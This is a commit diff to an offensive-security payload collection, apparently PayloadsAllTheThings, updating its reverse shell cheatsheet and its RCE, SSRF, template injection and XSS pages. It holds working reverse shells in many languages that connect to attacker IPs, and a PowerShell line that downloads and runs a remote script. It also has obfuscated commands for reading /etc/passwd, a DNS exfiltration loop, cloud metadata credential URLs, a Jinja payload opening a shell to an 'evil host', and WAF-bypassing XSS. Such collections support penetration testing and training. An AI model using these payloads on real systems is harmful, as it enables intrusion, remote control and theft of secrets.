Multiple update in READMEs + RCE tricks

Methodology and Resources/Reverse Shell Cheatsheet.md

@@ -2,14 +2,14 @@
 
 ## Reverse Shell Cheat Sheet
 
-Bash TCP
+### Bash TCP
 ```bash
 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
 
 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
 ```
 
-Bash UDP
+### Bash UDP
 ```
 Victim:
 sh -i >& /dev/udp/127.0.0.1/4242 0>&1
@@ -19,7 +19,7 @@ nc -u -lvp 4242
 ```
 
 
-Perl
+### Perl
 ```perl
 perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 
@@ -30,17 +30,17 @@ NOTE: Windows only
 perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
 ```
 
-Python
+### Python
 ```python
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 ```
 
-PHP
+### PHP
 ```bash
 php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```
 
-Ruby
+### Ruby
 ```ruby
 ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
 
@@ -51,23 +51,23 @@ ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.pope
 ```
 
 
-Netcat Traditional
+### Netcat Traditional
 ```bash
 nc -e /bin/sh [IPADDR] [PORT]
 ```
 
-Netcat OpenBsd
+### Netcat OpenBsd
 ```bash
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
 ```
 
-Ncat
+### Ncat
 ```bash
 ncat 127.0.0.1 4444 -e /bin/bash
 ncat --udp 127.0.0.1 4444 -e /bin/bash
 ```
 
-Powershell
+### Powershell
 ```powershell
 powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```
@@ -81,14 +81,14 @@ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40
 powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
 ```
 
-Java
+### Java
 ```java
 r = Runtime.getRuntime()
 p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
 p.waitFor()
 ```
 
-NodeJS
+### NodeJS
 ```javascript
 (function(){
     var net = require("net"),
@@ -102,8 +102,28 @@ NodeJS
     });
     return /a/; // Prevents the Node.js application form crashing
 })();
+
+
+or 
+
+require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
+
+or 
+
+-var x = global.process.mainModule.require
+-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
 ```
 
+### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
+```javascript
+String host="localhost";
+int port=8044;
+String cmd="cmd.exe";
+Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
+```
+NOTE: Java reverse shell also work for Groovy
+
+
 ## Spawn TTY
 ```
 /bin/sh -i

README.md

@@ -29,68 +29,40 @@ You might also like :
     * Tomcat CVE-2017-12617.py
 
 
-## Tools
-* [Kali Linux](https://www.kali.org/)
-* [Web Developer](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/)
-* [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search) - Not compatible with Firefox Quantum
-* [Burp Proxy](https://portswigger.net)
-* [Fiddler](https://www.telerik.com/download/fiddler)
-* [DirBuster](https://sourceforge.net/projects/dirbuster/)
-* [GoBuster](https://github.com/OJ/gobuster)
-* [Knockpy](https://github.com/guelfoweb/knock)
-* [SQLmap](http://sqlmap.org)
-* [Nikto](https://cirt.net/nikto2)
-* [Nessus](http://www.tenable.com/products/nessus-vulnerability-scanner)
-* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
-* [Wappalyzer](https://wappalyzer.com/download)
-* [Metasploit](https://www.metasploit.com/)
-* [OpenVAS](http://www.openvas.org/)
+## Try Harder
+Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills.
 
+* __Bug Bounty Platforms__
+  * [HackerOne](https://hackerone.com)
+  * [BugCrowd](https://bugcrowd.com)
+  * [Bounty Factory](https://bountyfactory.io)
+  * [Synack](https://www.synack.com/)
+  * [Intigriti](https://www.intigriti.com)
+  * [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
+* __Online Platforms__
+  * [Hack The Box](hackthebox.eu/)
+  * [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
+  * [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
+  * [Zenk-Security](https://www.zenk-security.com/epreuves.php)
+  * [Root-Me](https://www.root-me.org)
+  * [W3Challs](https://w3challs.com/)
+  * [NewbieContest](https://www.newbiecontest.org/)
+  * [Vulnhub](https://www.vulnhub.com/)
+  * [The Cryptopals Crypto Challenges](https://cryptopals.com/)
+  * [alert(1) to win](https://alf.nu/alert1)
+  * [Hacksplaining](https://www.hacksplaining.com/exercises)
+  * [HackThisSite](https://hackthissite.org)
+  * [Hackers.gg](hackers.gg)
+  * [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
 
-## Online Challenges
-* [Hack The Box](hackthebox.eu/)
-* [Root-Me](https://www.root-me.org)
-* [Zenk-Security](https://www.zenk-security.com/epreuves.php)
-* [W3Challs](https://w3challs.com/)
-* [NewbieContest](https://www.newbiecontest.org/)
-* [Vulnhub](https://www.vulnhub.com/)
-* [The Cryptopals Crypto Challenges](https://cryptopals.com/)
-* [Penetration Testing Practice Labs](http://www.amanhardikar.com/mindmaps/Practice.html)
-* [alert(1) to win](https://alf.nu/alert1)
-* [Hacksplaining](https://www.hacksplaining.com/exercises)
-* [HackThisSite](https://hackthissite.org)
-* [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
-* [Hackers.gg](hackers.gg)
-
-## Bug Bounty
-* [HackerOne](https://hackerone.com)
-* [BugCrowd](https://bugcrowd.com)
-* [Bounty Factory](https://bountyfactory.io)
-* [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
-
-## Docker
-| Command     | Link |
-| :------------- | :------------- |
-| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
-| `docker pull paoloo/sqlmap`     | [docker-sqlmap](https://hub.docker.com/r/paoloo/sqlmap/)         |
-| `docker pull kalilinux/kali-linux-docker` | [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) |
-| `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) |
-| `docker pull wpscanteam/wpscan`       | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) |
-| `docker pull infoslack/dvwa`          | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) |
-| `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) |
-| `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) |
-| `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) |
-| `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) |
-| `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) |
-| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |
-
-
-## More resources
-### Book's list:
+## Book's list
+Grab a book and relax, these ones are the best security books (in my opinion).
 * [Web Hacking 101](https://leanpub.com/web-hacking-101)
+* [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
 * [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
 * [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
 * [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
+* [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
 * [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
 * [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
 * [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
@@ -104,16 +76,36 @@ You might also like :
 * [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
 * [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
 
+
+## More resources
+
 ### Blogs/Websites
-* http://blog.zsec.uk/101-web-testing-tooling/
-* https://blog.innerht.ml
-* https://blog.zsec.uk
-* https://www.exploit-db.com/google-hacking-database
-* https://www.arneswinnen.net
-* https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102
+* [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
+* [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
+* [Tips from Top Hackers – Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
+* [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
+* [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
+* [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
 
 ### Youtube
 * [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
 * [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
 * [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
 * [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
+
+
+### Docker
+| Command     | Link |
+| :------------- | :------------- |
+| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
+| `docker pull paoloo/sqlmap`     | [docker-sqlmap](https://hub.docker.com/r/paoloo/sqlmap/)         |
+| `docker pull kalilinux/kali-linux-docker` | [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) |
+| `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) |
+| `docker pull wpscanteam/wpscan`       | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) |
+| `docker pull infoslack/dvwa`          | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) |
+| `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) |
+| `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) |
+| `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) |
+| `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) |
+| `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) |
+| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |

Remote commands execution/README.md

@@ -1,5 +1,6 @@
 # Remote Commands Execution
-Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
+Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.    
+NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
 
 
 ## Exploits
@@ -87,6 +88,13 @@ Bypass blacklisted word with $@
 who$@ami
 ```
 
+Bypass blacklisted word with variable expansion
+```powershell
+test=/ehhh/hmtc/pahhh/hmsswd 
+cat ${test//hhh\/hm/}
+cat ${test//hh??hm/}
+```
+
 Bypass zsh/bash/sh blacklist
 ```powershell
 echo $0
@@ -94,6 +102,12 @@ echo $0
 echo whoami|$0
 ```
 
+## Challenge
+Challenge based on the previous tricks, what does the following command do: 
+```powershell
+g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
+```
+
 
 ## Time based data exfiltration
 Extracting data : char by char
@@ -118,13 +132,9 @@ Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.
 for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 ```
 
-## Environment based
-NodeJS Commands execution
-```powershell
-require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
-```
 
 ## Thanks to
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
 * [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
 * [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
+* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)

SSRF injection/README.md

@@ -1,6 +1,23 @@
 # Server-Side Request Forgery
 Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
 
+## Summary
+* [Exploit with localhost]()
+* [Bypassing filters]()
+* [SSRF via URL Scheme]()
+* [SSRF to XSS]()
+* [SSRF URL for Cloud Instances]()
+  * [SSRF URL for AWS Bucket]()
+  * [SSRF URL for Google Cloud]()
+  * [SSRF URL for Digital Ocean]()
+  * [SSRF URL for Packetcloud]()
+  * [SSRF URL for Azure]()
+  * [SSRF URL for OpenStack/RackSpace]()
+  * [SSRF URL for HP Helion]()
+  * [SSRF URL for Oracle Cloud]()
+  * [SSRF URL for Alibaba]()
+
+
 ## Exploit with localhost
 
 Basic SSRF v1
@@ -203,8 +220,9 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brut
 ```
 
 
-
-## SSRF on AWS Bucket - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
+## SSRF URL for Cloud Instances
+### SSRF URL for AWS Bucket
+[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
 Interesting path to look for at http://169.254.169.254
 ```
 Always here : /latest/meta-data/{hostname,public-ipv4,...}
@@ -253,7 +271,7 @@ http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
 http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
 ```
 
-## SSRF URL for Google Cloud
+### SSRF URL for Google Cloud
 Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
 ```
 http://169.254.169.254/computeMetadata/v1/
@@ -275,7 +293,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/
 ```
 
 
-## SSRF URL for Digital Ocean
+### SSRF URL for Digital Ocean
 https://developers.digitalocean.com/documentation/metadata/
 ```powershell
 curl http://169.254.169.254/metadata/v1/id
@@ -291,12 +309,12 @@ All in one request:
 curl http://169.254.169.254/metadata/v1.json | jq
 ```
 
-## SSRF URL for Packetcloud
+### SSRF URL for Packetcloud
 ```
 https://metadata.packet.net/userdata
 ```
 
-## SSRF URL for Azure
+### SSRF URL for Azure
 Limited, maybe more exist? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
 ```
 http://169.254.169.254/metadata/v1/maintenance
@@ -308,19 +326,19 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02
 http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
 ```
 
-## SSRF URL for OpenStack/RackSpace 
+### SSRF URL for OpenStack/RackSpace 
 (header required? unknown)
 ```
 http://169.254.169.254/openstack
 ```
 
-## SSRF URL for HP Helion 
+### SSRF URL for HP Helion 
 (header required? unknown)
 ```
 http://169.254.169.254/2009-04-04/meta-data/ 
 ```
 
-## SSRF URL for Oracle Cloud
+### SSRF URL for Oracle Cloud
 ```
 http://192.0.0.192/latest/
 http://192.0.0.192/latest/user-data/
@@ -328,7 +346,7 @@ http://192.0.0.192/latest/meta-data/
 http://192.0.0.192/latest/attributes/
 ```
 
-## SSRF URL for Alibaba
+### SSRF URL for Alibaba
 ```
 http://100.100.100.200/latest/meta-data/
 http://100.100.100.200/latest/meta-data/instance-id

Server Side Template injections/README.md

@@ -5,10 +5,11 @@
 Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
 e.g:
 ```
-./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
+python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell 
+python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
+python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade 
 ```
 
-
 ## Ruby
 ### Basic injection
 ```python
@@ -21,8 +22,8 @@ e.g:
 ```
 
 
-## Java
-### Basic injection
+## Java 
+### Basic injection
 ```java
 ${7*7}
 ${{7*7}}
@@ -174,6 +175,13 @@ Inject this template
 {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
 ```
 
+## AngularJS
+### Basic injection
+```javascript
+$eval('1+1')
+{{1+1}}
+```
+
 ## Thanks to
  * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
  * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)

Web cache deception/README.md

@@ -18,8 +18,9 @@
 5. The content of the cache is displayed
 ```
 
-[![IMAGE ALT TEXT HERE](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)   
+[![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)   
 Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
 
 ## Thanks to
-* http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html
+* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
+* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)

XSS injection/README.md

@@ -644,6 +644,12 @@ Exotic payloads
 
 ## Common WAF Bypass
 
+### Chrome Auditor - 9th august
+```javascript
+</script><svg><script>alert(1)-%26apos%3B
+```
+Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
+
 ### Incapsula WAF Bypass - 8th march
 ```javascript
 anythinglr00</script><script>alert(document.domain)</script>uxldz
@@ -663,10 +669,10 @@ Use notification box instead of an alert - by [@brutelogic](https://twitter.com/
 Note : it requires user permission
 ```
 Notification.requestPermission(x=>{new(Notification)(1)})
-
-Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//
 ```
 
+Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)
+
 
 ## Thanks to
 * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot